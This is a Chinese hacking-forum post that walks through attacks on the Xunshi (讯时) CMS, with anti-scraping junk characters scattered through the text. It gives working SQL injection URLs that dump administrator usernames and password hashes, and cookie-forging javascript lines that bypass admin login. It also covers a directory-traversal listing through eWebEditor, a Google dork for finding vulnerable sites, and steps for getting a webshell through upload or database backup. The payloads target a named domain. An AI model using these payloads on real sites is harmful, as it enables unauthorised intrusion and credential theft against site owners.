讯时漏洞总结

admin

by:血封忆尘

+ B9 G" l" H% j3 P在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

以下本文总结来自黑防去年第9期杂志上的内容...
$ C- G) B) k: x- {' R" E
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

  q: J* P6 Z2 M! P. j记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
( s) d  z5 n9 E: [, e3 p这里一个注入

# F5 Z  l' S& [9 t) u, O6 A* ]效果如图:

2 c# K& ~; b) c$ ~! s: f4 ~
; g; V6 u) }% O  r$ \2 r( C
. R# j! t7 K$ `; t, b4 F' u% }这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

% v4 b" t' z% w7 r) u密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
, w: r* ?& d' y3 M
9 Y* i4 F+ O! h6 }/ k- z* t( C, Ljavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
# H+ a# `( [! C# x3 B! X) v
  c0 k1 X1 G, a+ n+ C) g那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
7 `7 C9 j: `, D
" A$ g2 B3 [( V* I8 g# k$ r9 ]因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
8 L+ _5 ^  D0 c& {3 b: E% _
访问这页面来列目录..步骤如下:

javascript:alert(document.cookie="admindj=1")

" `3 t; L' R' z; j2 n0 Chttp://www.political-security.co ... asp?id=46&dir=../..
" A$ U5 O. ]. {8 P- ?1 x; M
效果如图:
9 M% n2 b" m: C1 a6 G


这样全站目录都能瞧了..找到后台目录..进去..

那么进了后台怎么拿shell？？上传--备份就ok了..
: z5 k& S; n/ t( k3 M  Z) O
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

这个我也碰到过一次..你都可以通过列目录来实现..

4 B) _; R) D4 X) K0 s2 E- j& ^2 o7 yjavascript:alert(document.cookie="admindj=1")
; a( s" K+ g* l; P1 ]5 L
http://www.political-security.co ... p?action=BackupData

" E8 _3 N. u% X1 E* I备份ok..

$ f5 ]1 ~' o: X7 ~' \- `$ w那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
* X0 V& o7 B9 D3 F- ^, Q9 Z0 y
0 Y. ]% V8 w$ Q在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
$ N. a- R. P* u1 k& E* W! C
% r2 ?$ ]" k* T# i; v7 e然后访问此页面进行注入..步骤如下:

javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
2 i6 x3 R3 D$ G1 ^  L
然后请求admin/admin_chk.asp页面

输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

. X/ J2 |' a4 i1 d26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

效果如图所示:



  c! Z3 B( J/ _! K% `7 [讯时漏洞2
2 M. B+ U0 d' [. dgoogle关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
" V1 Q! Y) t, U( g" Z' Q
1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句
! u* u4 e) R/ V
2 z9 B1 B7 c, s6 x2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！



$ p$ E" T5 E& \# s; B; C3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

' ~- g4 X& N: {# m

; n$ ?0 Z$ F% t# q: D爆出管理员帐号和密码了

  V. h" j7 U1 f* R6 M: n

4、cookies进后台
& ~) X  K) r4 ?
: x  C" u' h$ kjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
, g% J' P  b9 J* I9 T


% d/ S& v3 {5 `+ b$ |: Z" }8 w5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
1 m3 u( b& s& M+ s( L

1 O1 u" M: o( u# r
6、后台有上传和备份取SHELL不难。
" P1 M9 c, e% W
' W; I6 F% [8 b  q  R9 W7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！

/ s9 |* q8 f+ o
" f7 x2 {( e+ T9 T